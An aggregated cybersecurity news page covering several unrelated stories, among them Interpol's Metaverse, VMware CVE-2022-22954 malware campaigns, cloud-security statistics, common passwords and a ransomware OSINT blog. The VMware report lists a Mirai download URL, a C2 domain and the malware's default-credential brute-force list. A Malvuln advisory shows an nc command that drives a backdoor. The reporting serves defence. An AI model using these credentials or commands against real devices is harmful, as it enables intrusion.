Last week, at the 90th Interpol General Assembly in New Delhi, The International Criminal Police Organization launched the first global police Metaverse.
The Interpol Metaverse will help law enforces understand how crime could evolve in the virtual world and get ready for it.
Details about Interpol Metaverse
“Fully operational, the Interpol Metaverse allows registered users to tour a virtual facsimile of the Interpol General Secretariat headquarters in Lyon, France without any geographical or physical boundaries”, explains Interpol’s official statement.
The newly released tool can also be used by officers to share knowledge via their avatars and to take immersive forensic investigation and other policing training courses
Interpol has also established an Expert Group to represent police departments’ concerns about the new virtual world.
What Crimes Await for Us in the Metaverse
International Criminal Police Organization experts believe that the virtual world will be the palace for crimes against children, data theft, money laundering, financial fraud, counterfeiting, ransomware, phishing, sexual assault, and harassment. And as the number of users grows, the list of possible criminal offenses will grow too.
For law enforcement, some of these threats are likely to present significant challenges, because not all acts that are criminalized in the physical world are considered crimes when committed in the virtual world.
Financial crime-as-a-service in Metaverse, such as digital money-laundering tools, are also of concern to law enforcement, as are business email compromise, CEO impersonation fraud, e-commerce scams, and investment fraud.
Although the Metaverse is now in its early stages, according to technology research firm Gartner, by 2027, 40% of large corporations will use a combination of web3 and AR in virtual world projects. And by 2026, one out of every four people will be spending at least an hour per day working, studying, shopping, and socializing virtually.
Even now big tech companies are investing in VR headsets, software, content and environments. Beyond gaming and social networking, Metaverse has promise for virtual conferencing in business, design and testing processes, retail and, inevitably, crime.
Hackers have been exploiting a now-patched vulnerability in VMware Workspace ONE Access in campaigns to install various ransomware and cryptocurrency miners, a researcher at security firm Fortinet said on Thursday.
CVE-2022-22954 is a remote code-execution vulnerability in VMware Workspace ONE Access that carries a severity rating of 9.8 out of a possible 10. VMware disclosed and patched the vulnerability on April 6. Within 48 hours, hackers reverse-engineered the update and developed a working exploit that they then used to compromise servers that had yet to install the fix. VMware Workspace ONE access helps administrators configure a suite of apps employees need in their work environments.
In August, researchers at Fortiguard Labs saw a sudden spike in exploit attempts and a major shift in tactics. Whereas before the hackers installed payloads that harvested passwords and collected other data, the new surge brought something else—specifically, ransomware known as RAR1ransom, a cryptocurrency miner known as GuardMiner, and Mirai, software that corrals Linux devices into a massive botnet for use in distributed denial-of-service attacks.
“Although the critical vulnerability CVE-2022-22954 is already patched in April, there are still multiple malware campaigns trying to exploit it,” Fortiguard Labs researcher Cara Lin wrote. Attackers, she added, were using it to inject a payload and achieve remote code execution on servers running the product.
The Mirai sample Lin saw getting installed was downloaded from http[:]//107[.]189[.]8[.]21/pedalcheta/cutie[.]x86_64 and relied on a command-and-control server at “cnc[.]goodpackets[.]cc. Besides delivering junk traffic used in DDoSes, the sample also attempted to infect other devices by guessing the administrative password they used. After decoding strings in the code, Lin found the following list of credentials the malware used:
hikvision
1234
win1dows
S2fGqNFs
root
tsgoingon
newsheen
12345
default
solokey
neworange88888888
guest
bin
user
neworang
system
059AnkJ
telnetadmin
tlJwpbo6
iwkb
141388
123456
20150602
00000000
adaptec
20080826
vstarcam2015
v2mprt
Administrator
1001chin
vhd1206
support
NULL
xc3511
QwestM0dem
7ujMko0admin
bbsd-client
vizxv
fidel123
dvr2580222
par0t
hg2x0
samsung
t0talc0ntr0l4!
cablecom
hunt5759
epicrouter
zlxx
pointofsale
nflection
admin@mimifi
xmhdipc
icatch99
password
daemon
netopia
3com
DOCSIS_APP
hagpolm1
klv123
OxhlwSG8
In what appears to be a separate campaign, attackers also exploited CVE-2022-22954 to download a payload from 67[.]205[.]145[.]142. The payload included seven files:
phpupdate.exe: Xmrig Monero mining software
config.json: Configuration file for mining pools
networkmanager.exe: Executable used to scan and spread infection
phpguard.exe: Executable used for guardian Xmrig miner to keep running
init.ps1: Script file itself to sustain persistence via creating scheduled task
clean.bat: Script file to remove other cryptominers on the compromised host
encrypt.exe: RAR1 ransomware
In the event RAR1ransom has never been installed before, the payload would first run the encrypt.exe executable file. The file drops the legitimate WinRAR data compression executable in a temporary Windows folder. The ransomware then uses WinRAR to compress user data into password-protected files.
The payload would then start the GuardMiner attack. GuardMiner is a cross-platform mining Trojan for the Monero currency. It has been active since 2020.
The attacks underscore the importance of installing security updates in a timely manner. Anyone who has yet to install VMware’s April 6 patch should do so at once.
New research from cybersecurity company, Venafi, found that 81% of companies report that they have suffered a security incident in the cloud over the last year. And almost half (45%) report that their organization experienced at least four incidents.
The research looked to highlight the increased operational risk caused by companies migrating more of their applications to the cloud due to the complexity of cloud-native environments.
In fact, Venafi also found that companies currently host 41% of their applications on the cloud. That percentage is expected to rise to 57% throughout the next 18 months. As it rises, the need for robust cloud security will rise too.
Venafi’s research found that a majority feel cloud-based application security should be a shared responsibility between teams. Source: Venafi
With the complexity created by the cloud, machine identities have become a rich hunting ground for threat actors targeting the cloud. Every container — including Kubernetes cluster and microservices — needs an authenticated machine identity to communicate securely, such as a TLS certificate. Security and operational risks increase dramatically if one is compromised or misconfigured.
Venafi’s research also revealed that there is no clear industry standard for which the internal team is currently responsible for securing the cloud. Most commonly, this falls under the remit of enterprise security teams (25%), followed by operations teams responsible for cloud infrastructure (23%), a collaborative effort shared between multiple teams (22%), developers writing cloud applications (16%) and DevSecOps teams (10%).
There is also not a clear consensus among security decision-makers about who should be responsible for securing the cloud. Cloud infrastructure operations teams and enterprise security teams (both 24%) are among the most popular, followed by sharing responsibility across multiple teams (22%), developers writing cloud applications (16%) and DevSecOps teams (14%).
New approaches to security must make use of a control plane to embed machine identity management into developer workloads, allowing teams to protect the business without slowing production.
For its research, Venafi polled 1,101 security decision-makers at companies with over 1,000 employees. Twenty-four percent of those surveyed were at companies with more than 10,000 employees.
The passwordless future has not arrived yet. Until then, we are stuck with one of the most challenging features of modern life – password management. Because so many people reuse passwords, criminals harvest as many credentials as possible to sell to other criminals to enable ransomware attacks and data theft.
20 top compromised passwords in 2022
Rank
Password
1
123456
2
12345678
3
admin
4
a11111
5
123456789
6
password
7
1234
8
12345
9
secret
10
111111
11
123
12
1234567890
13
Password
14
1
15
admin123
16
1234567
17
123123
18
user
19
P@ssw0rd
20
root
There aren’t any surprises in the top 20 compromised passwords.
Tips for stronger passwords
Thankfully, ZeroFox does not collect data on only compromised plaintext passwords. Many of the credential dumps we ingest into the ZeroFox platform are hashed. In an increasing number of cases, we collected salted hashes that even we cannot crack. Unfortunately, many of the unsalted hashes we collected are well known and easily crackable.
To keep your passwords safe and protect your data, here are a few tips:
For system administrators: we encourage you to store user credentials using the strongest possible hashing algorithm and salting those hashes.
For users: Length and uniqueness are key. Password managers, whether the built in password managers in modern browsers or commercially available options, are the best way to ensure if one credential is compromised your whole digital life isn’t at risk.
For security teams: it’s wise to have a threat intelligence service continually scouring the Underground Economy for your employees and customer’s compromised credentials.
Threat: Backdoor.Win32.Psychward.10 Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 13013. Third-party adversarys who can reach infected systems can issue various commands made available by the backdoor. Family: Psychward Type: PE32 MD5: 70c5f8d61f6ac67091c0c5860e456427 Vuln ID: MVID-2022-0651 Dropped files: winvxd.exe Disclosure: 10/22/2022
Exploit/PoC: C:\>nc64.exe x.x.x.x 13013
psychward final, ready for action exec "c:\Windows\system32\calc.exe" file executed
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
The White House last week held a meeting with the private sector, tech associations and government representatives to discuss the development of a security label for IoT devices. The label would be akin to the Energy Star label, an initiative led by the Environmental Protection Agency and the U.S. Department of Energy.
The label system, initially for routers and video cameras, will be designed so that “Americans can easily recognize which devices meet the highest cybersecurity standards to protect against hacking and other cyber vulnerabilities. By developing and rolling out a common label for products that meet U.S. government standards and are tested by vetted and approved entities, we will help American consumers easily identify secure tech to bring into their homes,” the White House said last week in a document that described the event.
Home routers and video devices are often commandeered by criminals and employed in distributed denial-of-service attacks against organizations. It’s not clear yet what standards or vetting organizations are being considered. Industry reaction to the possible labeling system has been mixed but seems mostly positive.
“The ‘Energy Star’ label worries me about this one,” said Forrester VP and principal analyst Jeff Pollard. “That’s not exactly a stellar program. A yellow sticker on the thing you bought, that makes you feel better about the thing you bought … and that you notice after you bought the thing,” he said, doesn’t necessarily change the game.
John Pescatore, director of emerging security trends at the SANS Institute, pointed to prior successful government and private industry standards efforts. “There is a long history around fire resistant material standards where independent organizations like UL Labs worked with government agencies like NIST, the Association for Testing and Materials and the National Fire Protection Association to make sure that a wide variety of flammable things were much safer,” said Pescatore.
“This all succeeded because the government didn’t try to dictate standards, it worked with private industry to make sure that procurements and use of flammable “things” had to include compliance with the industry standards,” he said.
Pescatore pointed to a number of existing meaningful technology standards efforts, as well, including the Connectivity Standards Alliance-IoT which has some big names on board: Amazon, Apple, Google and Samsung, among others.
“If the U.S. government put its buying power behind some consensus standards, the bar for IoT security will be raised,” he added. “It’s good to see elsewhere in the Biden announcement they specifically said they will be ‘strengthening the federal government’s cybersecurity requirements and raising the bar through the purchasing power of government,’” Pescatore said.
Greg Young, VP of cybersecurity at Trend Micro, agreed; he added that because IoT and home smart devices are exceptionally vulnerable, “a clear and consumer-focused label is a great idea.”
However, the devil is in the certification details, he added, and shared good and bad examples of previous efforts. “They [the government] need to remember what has been learned already or risk repeating the mistakes,” he said.
Young pointed to the NIST FIPS140-2 standard for certifying the use of cryptography as one of the greatest successes. “FIPS140-2 has a very narrow scope, four levels and a relatively speedy testing and validation process using government-certified private sector labs. Everyday devices such as the PIN pad on an ATM are certified under FIPS.”
The bad, in his view, proved to be Common Criteria. “Common Criteria was intended to provide certification for the security features in operating systems and security products and appliances. Common Criteria had too much scope creep in the goals, was complex to the level of ridiculousness, effectively allowed vendors to set their own bar for what would entail success by describing a ‘security target,’ and weighed down by documentation over testing. Common Criteria was effectively abandoned by the government and don’t think anyone misses it,” he said.
Young added that, as with all standards, maintaining the rating is an issue, especially with devices regularly patched and updated. “I’m encouraged that NIST has been flagged as a potential lead agency and I hope that they apply the blueprint of FIPS140-2 to this IoT effort,” he said. He added that, while simplistic, the analogy to the Energy Star rating is being used to emphasize the clarity required.
“I’m concerned, however, because the nature of IoT can be exceptionally broad and the scope of what is to be included can easily expand, and opinions can differ about what is important for IoT to be secure,” he continued. “Consumers need help in protecting themselves from the cybersecurity risks of IoT. This effort can be entirely successful, but the discipline required is exceptionally great in order to minimize the bureaucracy, maintain the scope, deliver speedy testing and make sense of how to maintain certifications in the face of easily changed product software,” he concluded.
Diana Kelley, chief strategy officer and chief security officer at Cybrize, said the time is long overdue for a way to provide consumers and enterprises with a reliable, normalized indicator of the security level of products and services, but warns that users can’t expect to displace their own security efforts with the arrival of a security label.
“The trick, of course, is to ensure the benchmarks being used are the right ones—and that buyers don’t lose sight of the fact that security in practice depends on both the relative security of the device and also how it’s used. The ‘safest’ car in the world still isn’t safe if the driver is unable to drive it safely,” she said.
International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000 people in 681 stores worldwide, most of them in Germany, its sales reached 24.8 billion euros in 2020.
The outages impacted stores worldwide, the company confirmed the cyber attack in an official statement, it is investigating the incident with the help of external experts:
“METRO/MAKRO is currently experiencing a partial IT infrastructure outage for several technical services. METRO’s IT team, together with external experts, immediately launched a thorough investigation to determine the cause of the service disruption. The latest results of the analysis confirm a cyber attack on METRO systems as the cause of the IT infrastructure outage.” reads the statement issued by the company.
The wholesale giant notified relevant authorities and warned customers that delays might occur due to service disruptions.
In response to the outage, the teams in the stores set up offline systems to process payments.
The company did not provide technical details about the attack, but the problems faced by Metro suggest it was the victim of a ransomware attack.
Being locked out of your laptop until you pay a ransom and having your social media accounts stolen are just two examples of hacking. However, when such hacking attempts move beyond a single person to an entire enterprise, it becomes a cyberattack. As you can imagine, a lot of damage can happen from a cyberattack due to the number of people affected. In this article, we explore the biggest global cyberattacks to give you an idea of how dangerous cyberattacks can be and why it’s important to take our online security as seriously as our physical one. This is one article you’ll want to read until the end.
The Biggest Global Cyberattacks in History
Cyberattacks have been on the rise recently, with the average cost of a data breach of $1.4 million. This makes one wonder if corporations should be spending more money on their cybersecurity. However, as we’ll see in this article, these 5 global cyberattacks cost much more.
SolarWinds cyberattack
Many multinational companies use SolarWinds’ Orion software to simplify their IT administration of on-premises and hybrid systems. However, in 2020, SolarWinds was hacked, exposing their clients, including government agencies, to hackers. Malicious code was included in one of SolarWinds’ Orion updates, and that’s how it spread to 18,000 of their customers’ systems.
The hackers first gained access to the SolarWinds system in September 2019, but the hack was discovered in December 2020. One of the many cybersecurity tips for students is frequently checking their systems for malicious code. However, the hackers planned the SolarWinds cyberattack very effectively, as their code mimicked normal network traffic.
The Melissa Virus
The year was 1999, and despite the internet just being 16 years old and most hard drives having capacities under 1 gigabyte, Daniel Lee Smith was still able to take advantage of current technologies to launch a cyberattack called the Melissa Virus. It was an email virus that particularly targeted Microsoft Word and Microsoft Outlook. This cyberattack was one of the first and biggest of them all. It affected many companies, including Microsoft. It’s estimated that it costs $80 million to repair all the affected systems.
Cyberattacks on Estonia
Modern warfare today has gone beyond physical fighting to cyberattacks. Most advanced nations rely heavily on IoT devices and the internet, which puts these systems in danger. Moreover, governments today understand that you can destroy or at least weaken your enemies if you manage to cripple their communications, and this was the case for Estonia in 2007. After a controversial decision to move a memorial, certain elements against it launched an attack on Estonia’s communication systems, thus affecting its economy and other related state infrastructure.
The events that followed made life very difficult for Estonia’s citizens. Many studies and research have been done to investigate the people involved in the attack. If you need to find some source material on this event, you may need a translation from the Estonian language.
Ukraine power grid attack
Following the unlawful annexation of Crimea by Russia, Ukrainians were faced with another problem: their power grid was attacked. The Sandworm group, the Russian cyber military unit, allegedly carried out this cyberattack. It’s also considered the first successful cyberattack on a power grid. In the end, it’s estimated that the attack affected anywhere between 200 and 300 thousand Ukrainians.
Colonial Pipeline Company ransomware attack
In 2021, the American Company Colonial Pipeline suffered a ransomware attack. This cyberattack was so severe that the company had to disable the largest pipeline in America for several days, and all it took was just one compromised password. Due to the fact they were losing money every day from their pipelines being down, the company later agreed to pay the hackers $4.4 million worth of bitcoin.
In Conclusion
Cybersecurity is something we should all take seriously. In some cases, you might only have your social media account hacked. However, as shown in this article, you might suffer immense financial and physical harm from a cybersecurity attack. Hopefully, this article was of great help to you and answered some questions regarding the importance of cybersecurity.
Author’s Bio
Carl Hill is a cybersecurity expert and freelance writer. His day job requires him to ensure that those he works with are well-informed on potential cybersecurity threats and know how to handle them. Carl loves his job as it allows him to be helpful to others. With that same mindset, Carl decided to start writing helpful content for his audience.
In this post, I will walk you step-by-step through techniques that will enable you to run threat intelligence analysis and research malware without spending a dime.
Chapter Zero – Triggering My Inner Threat Intelligence Analyst and Malware Researcher Ego
I recently saw a blog post by Trend Micro in the Curated Intelligence Discord group. The blog post describes a rather interesting ransomware incident discovered by Trend Micro, in which, yet again, a legitimate driver was utilized to terminate security-related processes from the kernel space. I was curious, so I looked into the IoC index.
I decided to look up the IoCs in VirusTotal, but, unfortunately, the only hash listed in the VT database (at the time of writing) was the driver mhyprot2.sys.
As I am lucky enough to have access to a premium VTI account and was determined to provide the juicy hashes to my community, I started researching.
Quickly, I found more campaigns from the same ransomware actor as well as the tools and ransomware associated with the Trend Micro report. Even as I stroked my bloated ego (after all, I had just found all those missing hashes), I remembered the days when I was starting out with malware research and begging for samples.
And so, I decided to challenge myself to find and download all the missing samples and attempt to attribute the ransomware actor using just OSINT and free tools.
Let’s dive in.
Chapter One – Finding the Malware Samples
I first looked up the driver mhyprot2.sys hash (0466E90BF0E83B776CA8716E01D35A8A2E5F96D3) in a VirusTotal Community account and selected the relations tab (I avoided the community tab as the collections and comments were not at all helpful in this case.)
As it is a legitimate gaming driver, it has a lot of execution parents, and the drop-down list of execution parents is crazy long. However, we do have some clues to search for. From the report, we know that avg.msi and avg.exe are responsible for dropping the driver onto the disk:
I decided to keep dropping more files within the execution parents list, and, what do you know ?!
Interesting … Let’s see what this hash is about. I clicked the (MD5: b6373b520a21c2e354b805d85a45a92d ) file name and hit jackpot!
Two files were missing: the ransomware file itself, called svchost.exe, and logon.bat. The first was quite easy to find. Just by clicking the dropped files within the MSI, I found that VirusTotal displayed a misleading name for the ransomware file. Clicking on the 6th file (with the long hash name) got me transferred to the following sample (5143bbdf1f53248c7743f8634c0ddbc ).
Great! Now for the missing batch file and the ransomware note. The only way I could think of is to trigger the MSI installation on a sandbox like AnyRun. In theory, not only would I gain access to all the files, as AnyRun allows anyone who pleases to download files from their reports, but I would also gain access to the logon.bat file and the ransomware note, which could aid in attribution.
Chapter Two – Downloading the Malware Samples
Back in the day, I used open malware repositories or begged my researcher friends to use their VTI access and download samples for me. The latter will obviously hurt our fragile ego, so let’s start looking up avg.exe and avg.msi in open malware repositories.
I searched the hashes in AnyRun, Malshare, Malware Bazaar, and Google. Finally, I hit the jackpot with Hybrid Analysis which allows registered users to download samples!
The next step was to download the file and trigger an execution on AnyRun, which should provide easy access to all the samples within this ransomware campaign.
Once I got my hands on the avg.msi sample, I ran it on AnyRun. There’s quite a nifty trick in AnyRun that I only discovered when I laid my hands on a premium account. It is possible to increase the machine run time by clicking the button Add Time at the top right. For a free account, it increases the run time from 1 minute to 5 minutes which changes quite a bit.
Anyway, I ran the sample, and, what do you know?! I found the entire infection process with all the missing files!
Here is logon.bat, which was missing in Virus Total.
Here is the ransomware note:
Chapter Three – The Malware Attribution Process
Sadly, this chapter will be quite short.
Spoilers! I couldn’t find the actor responsible for this ransomware.
I first tried to upload the ransomware note to ID Ransomware, which can attribute ransomware notes to ransomware actors by just uploading the ransomware note. ID Ransomware claimed that this ransomware note belonged to Nemucod.
Yet, I was doubtful. So I uploaded the ransomware file svchost.exe (since, by then, it was on Anyrun, I could download it for free) to Intezer, which offers a community account version. Intezer attempts to attribute files to malware and malicious actors by code “genes.”
That also wasn’t very helpful. Well…I did my best right?
See you guys next time!
Thanks to @1ZRR4H, who took a good look at the ransomware note and saw that the TOX-ID in the ransom note is the same one found in Rever Ransomware notes. A simple google search of the TOX-ID confirms it:
@Amigo_A_ has written about Rever ransomware. Read more about Rever Ransomware here.
A hacker who stole two unreleased songs from Ed Sheeran and sold them on the dark web has been jailed for 18 months.
Adrian Kwiatkowski traded the music by Sheeran and 12 songs by rapper Lil Uzi Vert in exchange for cryptocurrency, BBC News reports
The 23-year-old, from Ipswich, managed to get hold of them after hacking the performers’ digital accounts, the Crown Prosecution Service said.
Kwiatkowski admitted 19 charges, including copyright infringement and possessing criminal property.
He had made £131,000 from the music, City of London Police said.
Ipswich Crown Court heard that when the defendant’s Apple Mac laptop was searched, 565 audio files, including the songs by Sheeran and Vert, were uncovered.
Spirdark alias
An investigation was initially launched by US authorities in 2019.
It came after the management of several musicians reported to the New York District Attorney that someone known online as Spirdark had hacked a number of accounts and was selling the content.
The investigation linked the email address used to set up Spirdark’s cryptocurrency account to Kwiatkowski. His home address in the UK was also linked to an IP address used to hack one of the devices.
The case was then referred to the City of London Police and Kwiatkowski was arrested in September 2019.
According to police, seven devices, including a hard drive that contained 1,263 unreleased songs by 89 artists, were seized.
A document saved on the hard drive summarised the method he had used to obtain them along with a stash of Bitcoin which was seized.
Chief crown prosecutor Joanne Jakymec said Kwiatkowski had “complete disregard” for the musicians’ creativity, hard work and lost earnings.
“He selfishly stole their music to make money for himself by selling it on the dark web,” she said.
“We will be pursuing ill-gotten gains from these proceeds of crime.”
In August, Kwiatkowski pleaded guilty at Ipswich Magistrates Court to three charges of unauthorised access to computer material, 14 charges of selling copyrighted material, one charge of converting criminal property and two charges of possession of criminal property.
He also admitted receiving bitcoin cryptocurrency for the songs.
Detective Constable Daryl Fryatt said Kwiatkowski was highly skilled but it was unfortunate he used his talents unlawfully.
“Not only did he cause several artists and their production companies significant financial harm, he deprived them of the ability to release their own work,” he added.
Manhattan District Attorney Alvin Bragg Jr said the case showed “cybercrime knows no borders”.
“This individual executed a complex scheme to steal unreleased music in order to line his own pockets,” he said.
We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of the cookies. Cookie & Privacy Policy
This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
